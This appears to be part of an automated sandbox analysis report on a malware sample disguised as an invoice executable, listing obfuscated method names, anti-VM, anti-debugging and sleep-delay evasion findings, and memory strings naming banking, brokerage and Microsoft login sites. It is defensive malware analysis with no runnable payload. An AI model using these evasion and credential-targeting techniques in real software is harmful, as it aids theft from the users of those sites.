Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, rdjnA5kHW6FVW1v22F5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WjIojideG0', 'PYtontZNTy', 'p1SoNKlMH3', 'qsUoWeWVuT', 'G2KoeiZKAY', 'Eb9oRuptvr', 'QRdo0uIdfK'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, uP28d87bb3JInt4slZ.cs	High entropy of concatenated method names: 'iFiOLEkFbu', 'FowO8oxcmm', 'zTUOyyggSY', 'D3EOZi4XJE', 'UBlObZJK4g', 'MdNyeaZGBo', 'D8XyRfTBBQ', 'VQhy027nKb', 'qdKymNrSge', 'Xg5yDu0yUP'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, UcUWFu8W6ceNysrd4I.cs	High entropy of concatenated method names: 'YnaGGmBZ4', 'M8axDFF9O', 'BedujmrMZ', 'aBUAjXwI5', 'WTU7JTVGf', 'jUIvRjPL4', 'bXo48bPw3lANkaUnUo', 'A7ReepZ7pUtf0ITppJ', 'RhiMlkIFD', 'MXKoPdY6w'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, qyf5abrvsyY6ONiZon.cs	High entropy of concatenated method names: 'Ttbc5t2tFW', 'ungcS0WG6G', 'yZFcd9GBQ5', 'VYQcJ6JClo', 'o7oc8tWrlE', 'OWWcyF8V59', 'x8qcO60Pa5', 'RHpM07lkLR', 'ST3MmB6mHF', 'qNIMDl2rJU'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, LqaaTDCXXcs1Bkatoc.cs	High entropy of concatenated method names: 'KRPMVHggqf', 'f4EMiN41Xv', 'iGsM3cYMUJ', 'eiPMQlMf8p', 'xBNMj8aOEd', 'hZvMaIQGmS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, tLsmDfm2sEXvEoepHD.cs	High entropy of concatenated method names: 'icUOgwaEkH', 'KIvOT0kRFd', 'g7VOG13hlW', 'TPPOxdx46W', 'XZ3Ou1PC0t', 'vbFOATYUXc', 'DTJO7Emecd', 'yEKOv4ZfB0', 'YHCP9M5i5fkUj6QwpSe', 'EPPgvx5HRs9BjQGiGlP'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, HRqAi5zo58cVIJcpge.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vY5c4EJ1CB', 'Hv4cwTYwY2', 'rj9c6totx1', 'oPIclRD4tj', 'w6AcMO9OWE', 'tC4ccrZBEG', 'UoOcoxtZCx'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, IqK8bsYVEt7haTtUqc.cs	High entropy of concatenated method names: 'PeU8j4GV4l', 'q9c8nild0U', 'tCD8NMVWDs', 'dGe8WJPKGb', 'Jds8eX6cXh', 'uEL8R6frcH', 'WLJ80Gh8Y0', 'mg28mYsYG3', 'Qbj8DecTBB', 'cKv8EGOI33'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, TOsVUbRsuCOcpGkcfD.cs	High entropy of concatenated method names: 'F8Ewk1Pgpo', 'XufwBSxkFG', 'erCwjytQXa', 'VL9wn8UV5V', 'lMRwiGYBWF', 'GXpw36PXP0', 'gr8wQsU9he', 'dWiwao1yuE', 'ohJwUA8uGy', 'KabwFwp2NC'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, lmy47KswpkjG5DQ3SN.cs	High entropy of concatenated method names: 'Dispose', 'jMJ5DG8n9i', 'TS1qi2822s', 'TQ0XXOnXYg', 'gUF5EV97RQ', 'GOt5zrVj8F', 'ProcessDialogKey', 'H8wq9SmPRh', 'x1kq5qeofQ', 'yETqqSYqU6'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, mPWDn6SsOiw3DbUmrS.cs	High entropy of concatenated method names: 'p74MJayRl6', 'ttZM8gsUDY', 'yKrMr6svkE', 'uWrMyQYKjh', 'vPSMOgMwlE', 'z0PMZISj5A', 'JKFMbRRnhm', 'cL1MCqms5B', 'JKcM1a2o1n', 'SrTMPJGVhC'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, aVKKOBMHnAN631LZaN.cs	High entropy of concatenated method names: 'TGhZJDmURb', 'A2RZrsZJK0', 'bPJZOk4pBm', 'dOgOEPLCXk', 'eEWOzOKKuM', 'exmZ94M670', 'ofCZ5NmQv1', 'v6qZquuEDb', 'ebtZSRK0fk', 'BkHZd1qERJ'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, uC1ukaNOvDSNVPcieP.cs	High entropy of concatenated method names: 'SGDSLNWPCw', 'MSqSJpCI7o', 'tNpS8ITiTd', 'lNpSrDcBfH', 'BmgSy6xAQH', 'PL8SOtqvFZ', 'O9RSZEDZmC', 'JSCSbDslg6', 'N6wSCZr80t', 'LOOS1Y6hbo'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, Ep1iiUPZ9eVGuMqeAM.cs	High entropy of concatenated method names: 'BuWZTqlpUN', 'uyhZIRqvTm', 'xPxZGuMh3x', 'RpQZx5GpYx', 'CoNZs2Pr1y', 'UsHZulDhgV', 'jwNZARYJpP', 'Ww0ZY0DcYN', 'wrQZ782ula', 'tVFZvW1jRM'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, pRe6iEGYFy6rjPN2Fu.cs	High entropy of concatenated method names: 'C255ZsZSyo', 'yhF5bllatY', 'T9F518kZ7R', 'Lwy5Pj7u9s', 'H5x5wgda6G', 'bHR56qGElK', 'xcZX0Ru7XAOohVQfbR', 'UKa7YY3DanpgBMFBRZ', 'iUj55dhNhO', 'mUC5SlowUt'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, qDR1nokqdRKXT55LttR.cs	High entropy of concatenated method names: 'lj1cTPg7HP', 'JjFcInq3ix', 'Sl9cGNFE3i', 'TidcxjaA65', 'EYacsjGkRM', 'GDvcu1ajok', 'Hm0cAvlT5Q', 'opacY5Fib6', 'zvOc7EcHuK', 'd8ZcvC4xfH'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, cOTBnJXWhHoN3L5kKB.cs	High entropy of concatenated method names: 'k5vrxwNUyb', 'xOlruHfxc6', 'uB7rYVURmW', 'OWlr73BrZH', 'XuTrw3uZan', 'y2Gr6PKRcy', 'VRjrl7oMZZ', 'peDrM3mbj8', 'aPYrcvADSF', 'dWAroDIPwy'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, fy8m61vnZRqwT5qopV.cs	High entropy of concatenated method names: 'ToString', 'wSV6hws7K0', 'YPM6iItO4n', 'y9563Lh7nt', 'Jae6QfNrxe', 'T8Y6aBoqe3', 'trD6UppuJZ', 'BFS6FH6Cgy', 'g9V6Kk2Ut1', 'JqD6pHKLhu'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, i2sRDQQLDPWO0A5Knr.cs	High entropy of concatenated method names: 'pkq4YFu08A', 'jWi47LwPGY', 'e8N4VUp8y8', 'JPy4iutZy0', 'znE4QI6VGJ', 'YYM4aDYuvb', 'o9S4FL44dL', 'oC24K33JtO', 'esU4kx2lxu', 'TgQ4h261We'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, rdjnA5kHW6FVW1v22F5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WjIojideG0', 'PYtontZNTy', 'p1SoNKlMH3', 'qsUoWeWVuT', 'G2KoeiZKAY', 'Eb9oRuptvr', 'QRdo0uIdfK'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, uP28d87bb3JInt4slZ.cs	High entropy of concatenated method names: 'iFiOLEkFbu', 'FowO8oxcmm', 'zTUOyyggSY', 'D3EOZi4XJE', 'UBlObZJK4g', 'MdNyeaZGBo', 'D8XyRfTBBQ', 'VQhy027nKb', 'qdKymNrSge', 'Xg5yDu0yUP'

Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: FACTURA 24V70 VINS.exe PID: 5016, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: 1500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: 3140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: 2F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: 94B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: A4B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: A6C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: B6C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: C0F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: D0F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

Code function: 3_2_0177096E rdtsc

3_2_0177096E

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cacls.exe	Window / User API: threadDelayed 3341			Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Window / User API: threadDelayed 6630			Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\cacls.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe TID: 5796	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe TID: 1432	Thread sleep count: 3341 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe TID: 1432	Thread sleep time: -6682000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe TID: 1432	Thread sleep count: 6630 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe TID: 1432	Thread sleep time: -13260000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe TID: 6712	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe TID: 6712	Thread sleep time: -31500s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\cacls.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cacls.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\cacls.exe

Code function: 12_2_02DAC4D0 FindFirstFileW,FindNextFileW,FindClose,

12_2_02DAC4D0

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: n-T73hKo.12.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: n-T73hKo.12.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: n-T73hKo.12.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: n-T73hKo.12.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: n-T73hKo.12.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: n-T73hKo.12.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: n-T73hKo.12.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: cacls.exe, 0000000C.00000002.4647612526.0000000003181000.00000004.00000020.00020000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000002.4647897379.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3379875211.0000014976D6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: n-T73hKo.12.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: n-T73hKo.12.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: n-T73hKo.12.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: n-T73hKo.12.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: n-T73hKo.12.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: n-T73hKo.12.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: n-T73hKo.12.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: n-T73hKo.12.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: n-T73hKo.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: n-T73hKo.12.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: n-T73hKo.12.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: n-T73hKo.12.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: n-T73hKo.12.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: n-T73hKo.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: n-T73hKo.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: n-T73hKo.12.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

Code function: 3_2_0177096E rdtsc

3_2_0177096E

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

Code function: 3_2_00417853 LdrLoadDll,

3_2_00417853

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172C156 mov eax, dword ptr fs:[00000030h]	3_2_0172C156
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C8158 mov eax, dword ptr fs:[00000030h]	3_2_017C8158
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01736154 mov eax, dword ptr fs:[00000030h]	3_2_01736154
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01736154 mov eax, dword ptr fs:[00000030h]	3_2_01736154
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C4144 mov eax, dword ptr fs:[00000030h]	3_2_017C4144
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C4144 mov eax, dword ptr fs:[00000030h]	3_2_017C4144
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C4144 mov ecx, dword ptr fs:[00000030h]	3_2_017C4144
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C4144 mov eax, dword ptr fs:[00000030h]	3_2_017C4144
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C4144 mov eax, dword ptr fs:[00000030h]	3_2_017C4144
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01760124 mov eax, dword ptr fs:[00000030h]	3_2_01760124
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DA118 mov ecx, dword ptr fs:[00000030h]	3_2_017DA118
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DA118 mov eax, dword ptr fs:[00000030h]	3_2_017DA118
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DA118 mov eax, dword ptr fs:[00000030h]	3_2_017DA118
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DA118 mov eax, dword ptr fs:[00000030h]	3_2_017DA118
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_018061E5 mov eax, dword ptr fs:[00000030h]	3_2_018061E5
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F0115 mov eax, dword ptr fs:[00000030h]	3_2_017F0115
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DE10E mov eax, dword ptr fs:[00000030h]	3_2_017DE10E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DE10E mov ecx, dword ptr fs:[00000030h]	3_2_017DE10E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DE10E mov eax, dword ptr fs:[00000030h]	3_2_017DE10E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DE10E mov eax, dword ptr fs:[00000030h]	3_2_017DE10E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DE10E mov ecx, dword ptr fs:[00000030h]	3_2_017DE10E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DE10E mov eax, dword ptr fs:[00000030h]	3_2_017DE10E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DE10E mov eax, dword ptr fs:[00000030h]	3_2_017DE10E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DE10E mov ecx, dword ptr fs:[00000030h]	3_2_017DE10E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DE10E mov eax, dword ptr fs:[00000030h]	3_2_017DE10E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DE10E mov ecx, dword ptr fs:[00000030h]	3_2_017DE10E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017601F8 mov eax, dword ptr fs:[00000030h]	3_2_017601F8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_017AE1D0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_017AE1D0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017AE1D0 mov ecx, dword ptr fs:[00000030h]	3_2_017AE1D0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_017AE1D0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_017AE1D0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F61C3 mov eax, dword ptr fs:[00000030h]	3_2_017F61C3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F61C3 mov eax, dword ptr fs:[00000030h]	3_2_017F61C3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B019F mov eax, dword ptr fs:[00000030h]	3_2_017B019F
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B019F mov eax, dword ptr fs:[00000030h]	3_2_017B019F
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B019F mov eax, dword ptr fs:[00000030h]	3_2_017B019F
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B019F mov eax, dword ptr fs:[00000030h]	3_2_017B019F
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01804164 mov eax, dword ptr fs:[00000030h]	3_2_01804164
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01804164 mov eax, dword ptr fs:[00000030h]	3_2_01804164
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172A197 mov eax, dword ptr fs:[00000030h]	3_2_0172A197
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172A197 mov eax, dword ptr fs:[00000030h]	3_2_0172A197
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172A197 mov eax, dword ptr fs:[00000030h]	3_2_0172A197
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01770185 mov eax, dword ptr fs:[00000030h]	3_2_01770185
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017EC188 mov eax, dword ptr fs:[00000030h]	3_2_017EC188
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017EC188 mov eax, dword ptr fs:[00000030h]	3_2_017EC188
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D4180 mov eax, dword ptr fs:[00000030h]	3_2_017D4180
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D4180 mov eax, dword ptr fs:[00000030h]	3_2_017D4180
